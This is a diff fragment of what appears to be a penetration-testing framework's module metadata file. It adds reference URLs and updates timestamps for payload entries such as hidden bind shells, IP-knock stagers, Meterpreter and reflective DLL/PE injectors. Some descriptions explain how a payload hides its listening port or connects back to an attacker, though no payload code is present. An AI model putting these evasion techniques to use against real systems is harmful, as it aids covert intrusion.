+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/armle/execute/bind_tcp": {
    "name": "OS X Write and Execute Binary, Bind TCP Stager",
    "fullname": "payload/osx/armle/execute/bind_tcp",
@@ -220577,7 +223695,7 @@
    ],
    "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -220585,7 +223703,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/bind_hidden_ipknock_tcp",
@@ -220619,7 +223737,7 @@
    ],
    "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -220627,7 +223745,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/bind_hidden_tcp",
@@ -221711,7 +224829,8 @@
    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -221719,7 +224838,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp",
@@ -221753,7 +224872,8 @@
    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -221761,7 +224881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_hidden_tcp",
@@ -222883,7 +226003,8 @@
    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -222891,7 +226012,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp",
@@ -222926,7 +226047,8 @@
    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -222934,7 +226056,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_hidden_tcp",
@@ -224330,7 +227452,7 @@
    ],
    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -224338,7 +227460,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -224372,7 +227494,7 @@
    ],
    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -224380,7 +227502,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_hidden_tcp",
@@ -225113,7 +228235,7 @@
    ],
    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225121,7 +228243,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -225155,7 +228277,7 @@
    ],
    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225163,7 +228285,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp",
@@ -225896,7 +229018,8 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225904,7 +229027,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/peinject/bind_hidden_ipknock_tcp",
@@ -225938,7 +229061,8 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225946,7 +229070,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/peinject/bind_hidden_tcp",
@@ -225979,7 +229103,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226021,7 +229145,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226060,7 +229184,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226099,7 +229223,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226140,7 +229264,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226183,7 +229307,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226223,7 +229347,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226262,7 +229386,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226303,7 +229427,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226342,7 +229466,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226381,7 +229505,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226420,7 +229544,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226461,7 +229585,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226502,7 +229626,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226544,7 +229668,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226587,7 +229711,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226630,7 +229754,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226670,7 +229794,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226901,7 +230025,7 @@
    ],
    "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226909,7 +230033,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_hidden_ipknock_tcp",
@@ -226943,7 +230067,7 @@
    ],
    "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226951,7 +230075,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_hidden_tcp",
@@ -227795,7 +230919,7 @@
    ],
    "description": "Listen for a connection from certain IP and spawn a command shell.\n                          The shellcode will reply with a RST packet if the connections is not\n                          coming from the IP defined in AHOST. This way the port will appear\n                          as \"closed\" helping us to hide the shellcode.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227803,7 +230927,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell_hidden_bind_tcp",
@@ -227908,7 +231032,7 @@
    ],
    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227916,7 +231040,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_hidden_ipknock_tcp",
@@ -227950,7 +231074,7 @@
    ],
    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227958,7 +231082,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_hidden_tcp",
@@ -228730,7 +231854,8 @@
    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -228738,7 +231863,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp",
@@ -228772,7 +231897,8 @@
    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -228780,7 +231906,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_hidden_tcp",
@@ -230391,7 +233517,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-08-03 17:10:11 +0000",
    "path": "/modules/payloads/singles/windows/x64/messagebox.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/messagebox",
@@ -231235,7 +234361,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231275,7 +234401,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231314,7 +234440,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231353,7 +234479,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231397,7 +234523,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231437,7 +234563,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231476,7 +234602,7 @@
    ],
